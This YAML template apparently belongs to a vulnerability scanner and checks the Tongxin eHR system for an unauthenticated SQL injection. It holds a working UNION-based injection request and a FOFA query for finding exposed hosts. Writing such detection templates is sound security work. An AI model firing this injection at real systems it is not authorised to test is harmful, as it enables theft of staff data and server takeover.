http:
    - matchers:
        - part: body
          type: word
          words:
            - Microsoft SQL
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /Common/GetFlowDropDownListItems HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
          Content-Type: application/x-www-form-urlencoded; charset=utf-8

          FixedFormCode=1%27%20UNION%20ALL%20SELECT%20NULL%2C@@VERSION--
id: tongxinEHR-GetFlowDropDownListItems-sql
info:
    author: Superhero
    description: |-
        fofa: body="/TX.CDN"
        同鑫eHR人力资源管理系统 GetFlowDropDownListItems 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 同鑫eHR人力资源管理系统 GetFlowDropDownListItems SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486952&idx=1&sn=29793380904fdaa457ab73d2e9fc454a&chksm=c267b8dbf51031cd60d24d1f3dcaf4c2382753f1db0e591a02ff1775ce7a969bfd5412f78ed9&token=239710718&lang=zh_CN#rd
    severity: high
    tags:
        - 同鑫eHR人力资源管理系统
